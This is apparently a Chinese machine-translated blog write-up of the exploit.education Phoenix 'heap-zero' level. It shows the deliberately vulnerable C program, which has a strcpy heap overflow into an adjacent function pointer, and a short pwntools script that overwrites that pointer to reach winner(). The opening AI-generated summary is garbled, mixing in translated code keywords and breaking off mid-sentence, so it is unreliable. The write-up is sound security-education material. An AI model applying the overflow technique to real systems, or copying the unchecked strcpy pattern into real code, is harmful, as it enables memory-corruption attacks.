[pwn笔记6] 堆零 (phoenix)

2023年7月20日#pwn #format33

AI 翻译

这篇文章通过AI由英语翻译成中文。查看原文

AI 生成的摘要

标题：'[pwn笔记6] 堆零（菲尼克斯）' 日期：2023年07月20日23:46:28 网址名称："pwn6" 标签：[pwn, 格式] 堆零 /* 菲尼克斯/堆零，来自https://exploit.education * 你能劫持流程控制，并执行winner函数吗？ * 为什么C程序员是好的佛教徒？因为他们不是面向对象的。 */ 包括包括包括包括包括 #定义横幅 \ "欢迎来到" LEVELNAME "，由https://exploit.education提供" 结构数据 { char name[64]; }; 结构fp { void (*fp)(); char __pad[64 - sizeof(unsigned long)]; }; void winner() { printf("恭喜，您已通过此级别\n"); } void nowinner() { printf( "级别未通过-函数指针未被覆盖\n"); } int main(int argc, char **argv) { 结构数据 *d; 结构fp *f; printf("%s\n", BANNER); 如果（argc fp = nowinner; strcpy(d->name, argv[1]); int main(int argc, char **argv) { 结构数据 *d; 结构fp *f; printf("%s\n", BANNER); 如果（argc fp = nowinner; strcpy(d->name, argv[1]); printf("数据在%p处，fp在%p处，将调

heap-zero#

/*
 * phoenix/heap-zero, 由 https://exploit.education 提供
 *
 * 你能劫持流程控制并执行winner函数吗？
 *
 * 为什么C程序员是好的佛教徒？
 * 因为他们不是面向对象的。
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "欢迎来到" LEVELNAME "，由 https://exploit.education 提供"

struct data {
  char name[64];
};

struct fp {
  void (*fp)();
  char __pad[64 - sizeof(unsigned long)];
};

void winner() {
  printf("恭喜你，你已通过此关卡\n");
}

void nowinner() {
  printf(
      "关卡未通过 - 函数指针未被覆写\n");
}

int main(int argc, char **argv) {
  struct data *d;
  struct fp *f;

  printf("%s\n", BANNER);

  if (argc < 2) {
    printf("请指定一个要复制的参数 :-)\n");
    exit(1);
  }

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  strcpy(d->name, argv[1]);

  printf("data位于 %p，fp位于 %p，将调用 %p\n", d, f, f->fp);
  fflush(stdout);

  f->fp();

  return 0;
}

在堆上分配时，d 和 f 竟然挨在一起，太神奇了！

#!/usr/bin/env python3
from pwn import *
payload = b"a"*(0x60-0x10)
payload += b"\xbd\x0a\x40"
open("/home/user/buf","wb").write(payload)
p=process(["/opt/phoenix/amd64/heap-zero",payload])
p.interactive()